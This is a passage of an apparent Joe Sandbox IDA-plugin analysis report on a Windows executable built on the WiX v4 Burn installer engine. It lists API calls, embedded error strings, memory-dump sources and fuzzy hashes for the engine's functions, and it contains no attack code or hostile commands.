                                                                                                                                                                    • Part of subcall function 00918306: GetLastError.KERNEL32(?,00918154,?,?,00000000,?,00000000,00919840,?,0091B468,?,?,?,?,?), ref: 00918371
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,8D4BE800,00000000), ref: 0091A2AD
                                                                                                                                                                  Strings
                                                                                                                                                                  • string, xrefs: 0091A22A, 0091A232
                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 0091A242
                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 0091A209
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A17D, 0091A29F
                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 0091A188
                                                                                                                                                                  • Setting %ls variable '%ls' to value '%ls', xrefs: 0091A233
                                                                                                                                                                  • formatted, xrefs: 0091A223
                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 0091A1C6
                                                                                                                                                                  • Setting version variable '%ls' to value '%ls', xrefs: 0091A1F2
                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 0091A28D
                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0091A2BF
                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 0091A12E
                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 0091A101
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$string
                                                                                                                                                                  • API String ID: 2716280545-2464245954
                                                                                                                                                                  • Opcode ID: c1a9dcca057a4622c1c1733d5ab2e8b45471d612972dde65c737c0b93a0039be
                                                                                                                                                                  • Instruction ID: 24f03168b5c83395f4ab210345e86a15cf9042fddd9c6b92c0106f214b3f231e
                                                                                                                                                                  • Opcode Fuzzy Hash: c1a9dcca057a4622c1c1733d5ab2e8b45471d612972dde65c737c0b93a0039be
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51D631B42318BBDB35AA558D4AFE73A6CEF91B14F100819F925662D2D2B2DDC0C693
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000008,?,00000000,00000000,?,?), ref: 0092A749
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy log path to prefix., xrefs: 0092A903
                                                                                                                                                                  • Failed to copy default log extension., xrefs: 0092A706
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 0092A64C, 0092A66F, 0092A7DA
                                                                                                                                                                  • log, xrefs: 0092A6F5
                                                                                                                                                                  • Failed to copy full log path to prefix., xrefs: 0092A95B
                                                                                                                                                                  • Failed to get parent directory from '%ls'., xrefs: 0092A850
                                                                                                                                                                  • Failed to copy default log prefix., xrefs: 0092A6D3
                                                                                                                                                                  • Setup, xrefs: 0092A6C2
                                                                                                                                                                  • Failed to initialize logging., xrefs: 0092A660
                                                                                                                                                                  • Failed to copy log file path from command line., xrefs: 0092A63A
                                                                                                                                                                  • Failed to open log: %ls, xrefs: 0092A7C8
                                                                                                                                                                  • Failed to copy log extension to extension., xrefs: 0092A930
                                                                                                                                                                  • Failed to get non-session specific TEMP folder., xrefs: 0092A8A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                  • API String ID: 3472027048-3437580743
                                                                                                                                                                  • Opcode ID: 7114ef5cf8e44e63ec9f2b397e95c23e5be4537827e2b26ca3132f34d0380ffd
                                                                                                                                                                  • Instruction ID: ee007211b7814fdd51c61010edb22ac0f921930bbb4e1e4d915df3c855266302
                                                                                                                                                                  • Opcode Fuzzy Hash: 7114ef5cf8e44e63ec9f2b397e95c23e5be4537827e2b26ca3132f34d0380ffd
                                                                                                                                                                  • Instruction Fuzzy Hash: B7B11532B40325BFEB21AF649C45FAB77ACAF44700F154525F901EB285E7B1DD808BA2
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 0093DEB0
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0093DEC6
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0093DECF
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 0093DED6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0093DEE0
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0093DF7F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0093DF8C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 3030546534-373254902
                                                                                                                                                                  • Opcode ID: e0ec23cf0ac6cf8e6a1ee86214092379d0127866db49cb855215a454256e295d
                                                                                                                                                                  • Instruction ID: b34d6341cae8be8721461731de21e923795403a97458eb893fdbb9da6999517f
                                                                                                                                                                  • Opcode Fuzzy Hash: e0ec23cf0ac6cf8e6a1ee86214092379d0127866db49cb855215a454256e295d
                                                                                                                                                                  • Instruction Fuzzy Hash: CF310777A52224B7EB216B999C4AF9F3E6CDF89B60F010150FE05BF1D1D6709C409AE0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,00000000,00916570,00000000,?,?,?,0097284A,00000000,?,00916C5C,00000000), ref: 00972B11
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,00000000,00916570,00000000,?,?,?,0097284A,00000000,?,00916C5C), ref: 00972B20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary$ErrorLastLoadTask
                                                                                                                                                                  • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll
                                                                                                                                                                  • API String ID: 3444712580-2659096373
                                                                                                                                                                  • Opcode ID: 800eda45b4caa5d3b48763e95a0c362db99f122e2fc6e4585148480046423703
                                                                                                                                                                  • Instruction ID: 15833a1dafeb588dc1444440a8a9c73fcdb13fa09d0d6447bbee6ce711d1d5d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 800eda45b4caa5d3b48763e95a0c362db99f122e2fc6e4585148480046423703
                                                                                                                                                                  • Instruction Fuzzy Hash: D031C432B90228B6EB326B958C0AFAF6E69DBD6B50F114155F9087A1D1E7F08E80D5D0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,00000000,00000000,?,?,009334D1,00000000,?), ref: 00932AF3
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,009334D1,00000000,?), ref: 00932AFD
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?,009334D1,00000000,?), ref: 00932B04
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009334D1,00000000,?), ref: 00932B0E
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,009334D1,00000000,?), ref: 00932BAF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                  • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 4224961946-761155037
                                                                                                                                                                  • Opcode ID: 5ac82d8a59fa7bba04fc073803d8be018d1b63471153681a2b99cbb1fe318248
                                                                                                                                                                  • Instruction ID: 08c4a6c40ce35863b765873250f08921568593566c43e476ba3aced51a4eeb1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ac82d8a59fa7bba04fc073803d8be018d1b63471153681a2b99cbb1fe318248
                                                                                                                                                                  • Instruction Fuzzy Hash: 9521F972A40319B7E7106BA89C0AF9FBB7C9F45720F100641FA24FB2D1E2709D509BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00916C94,00000000,00000000,00000000,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570), ref: 009167AF
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00916C28,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167BC
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0091663C,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167D3
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00916CEC,00916C78,00916C5C,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167F8
                                                                                                                                                                    • Part of subcall function 0096B796: OpenProcessToken.ADVAPI32(00916570,00000008,00000000,00916C5C,00916C78,00000000,00916570,00000000,?,?,?,?,?,?), ref: 0096B7B4
                                                                                                                                                                    • Part of subcall function 0096B796: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B7BE
                                                                                                                                                                    • Part of subcall function 0096B796: CloseHandle.KERNELBASE(00000000), ref: 0096B876
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0098E414,000000FF,00916C5C,00916C78,00916570,?,00000000,?), ref: 0093470C
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0093472F
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00934752
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E458,000000FF), ref: 00934775
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E45C,000000FF), ref: 00934798
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009347BB
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 0091688C
                                                                                                                                                                  • Failed to initialize engine section., xrefs: 0091684D
                                                                                                                                                                  • Fatal error while parsing command line., xrefs: 00916824
                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 0091687A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 268551788-2320754317
                                                                                                                                                                  • Opcode ID: 378725962f54fc5a275faec83f9a50cbfc05e90028d17980609a7a956c4f0530
                                                                                                                                                                  • Instruction ID: 634070a5152bdcd39db9cd1c812448b19371a16b3952989618e2eef3b06eb10f
                                                                                                                                                                  • Opcode Fuzzy Hash: 378725962f54fc5a275faec83f9a50cbfc05e90028d17980609a7a956c4f0530
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B315472A41219BBDB01DFA4DC85FDB3BACAF48750F0502B5FE08EF185E674A5448BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00916570,00000008,00000000,00916C5C,00916C78,00000000,00916570,00000000,?,?,?,?,?,?), ref: 0096B7B4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B7BE
                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?,?,?,?,?,?,?), ref: 0096B807
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B820
                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0096B876
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                  • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 4040495316-1812211342
                                                                                                                                                                  • Opcode ID: 86b54377c2d46a968cc22a9f3545fe7f3890f2a3e90b00cd0c77868bb474ed17
                                                                                                                                                                  • Instruction ID: dd59852529a7ffd80805b1a9355b843b40568e42e1460f0af769065a937ef0c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 86b54377c2d46a968cc22a9f3545fe7f3890f2a3e90b00cd0c77868bb474ed17
                                                                                                                                                                  • Instruction Fuzzy Hash: B621E432E41228BBD7219B559C49FAEBAACEF45750F014055FE08FB2A0F3748E80DAD0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0097059B
• CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,009AD6D8,?,00000000,00917C5D,?,?,?,?,?,?), ref: 009705EA
• CLSIDFromProgID.OLE32(MSXML.DOMDocument,009AD6D8,?,?,?,?,?,?), ref: 009705FA
Strings
• failed to get CLSID for XML DOM, xrefs: 00970606
• failed to initialize COM, xrefs: 009705AF
• Msxml2.DOMDocument, xrefs: 009705E5
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 009705BB
• MSXML.DOMDocument, xrefs: 009705F5
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FromProg$Initialize
• String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM
• API String ID: 4047641309-3267221515
• Opcode ID: ff6e03e56e81bc1e0ea45a90de2844684fd1893c0b41e2da44efa859e473e62b
• Instruction ID: a8eb372bb2df3a55beb9c9ea0cb75374c02b0622f321d08146242939ca104f96
• Opcode Fuzzy Hash: ff6e03e56e81bc1e0ea45a90de2844684fd1893c0b41e2da44efa859e473e62b
• Instruction Fuzzy Hash: 0101F773BD6730B7E33117165C0AB571948ABE6BA6F018112B90EE7180E5D449809AD0
APIs
• GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 00973C09
• GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00973C54
• GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00973C98
• GetLastError.KERNEL32(?,0097F890,?,00000000,?,00000000,00000000,00000000), ref: 00973CF6
• GlobalFree.KERNEL32(?), ref: 00973D48
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast$Global$AllocFree
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
• API String ID: 1145190524-120110023
• Opcode ID: d05eb6ca50f7401b542a328a5523f123b35b56b1a173bc5c6ffc13df021c647f
• Instruction ID: db26f4d9bd4b19c7ab6d57b0770bc7c52bc06d5b268109ab6a4701c8430436e7
• Opcode Fuzzy Hash: d05eb6ca50f7401b542a328a5523f123b35b56b1a173bc5c6ffc13df021c647f
• Instruction Fuzzy Hash: 5841C473B40328BBD72196549C06FEF7A6CAF85B60F11C165BE48BB2C1D670CE00A6E1
APIs
• CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000005,00000000,00000000,00000005,00000000,00000000,00000000,0000001C), ref: 00971F49
• GetLastError.KERNEL32(?,?,?,0092F669,?,0000001C,00000000,0000001C,?,00000000,WiX\Burn,PackageCache,00000000,0000001C,00000018,00000000), ref: 00971F53
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CompareErrorLastString
• String ID: Both paths are required.$Failed to canonicalize wzPath1.$Failed to canonicalize wzPath2.$Failed to compare canonicalized paths.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 1733990998-2188151180
• Opcode ID: 4444cbae7e6e8cf645f11d3297e06fa0aa58f7fa2205b26a448ecdd8146c6aad
• Instruction ID: 5b86fc91c77996593539195a7fdff3caa618fea53735e1e9434d63b05ae2898b
• Opcode Fuzzy Hash: 4444cbae7e6e8cf645f11d3297e06fa0aa58f7fa2205b26a448ecdd8146c6aad
• Instruction Fuzzy Hash: 4B315E73A10228BBDB2156588C46FFFB9ACDB85B64F118215F908BA2D0D3B09D40D6D4
APIs
• CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
• GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: cannot find parent path$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
• API String ID: 1375471231-3388094611
• Opcode ID: 7fb9893aa53d12664ea32aab8d3a46624a6d8362bc75ed4f6991d1a3eb43aa85
• Instruction ID: 804d735b67a21ef1d839c0f91c76867d44408c9058e9580051cc831522fb9694
• Opcode Fuzzy Hash: 7fb9893aa53d12664ea32aab8d3a46624a6d8362bc75ed4f6991d1a3eb43aa85
• Instruction Fuzzy Hash: E3212826F44338B3EB312A548C46FFF6A5C9B85B60F010425FD58AB1D1D6A58CC2A2E0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 0-242608188
• Opcode ID: af84df120d6364cfe8ac61c1b8645785ded3e32762ccbc1bdfa0c68dcadc4823
• Instruction ID: 9d4ddbe78d24bd5d5d0f3272fc420261e0178f6cf99b5c75113ebdf03a4ce422
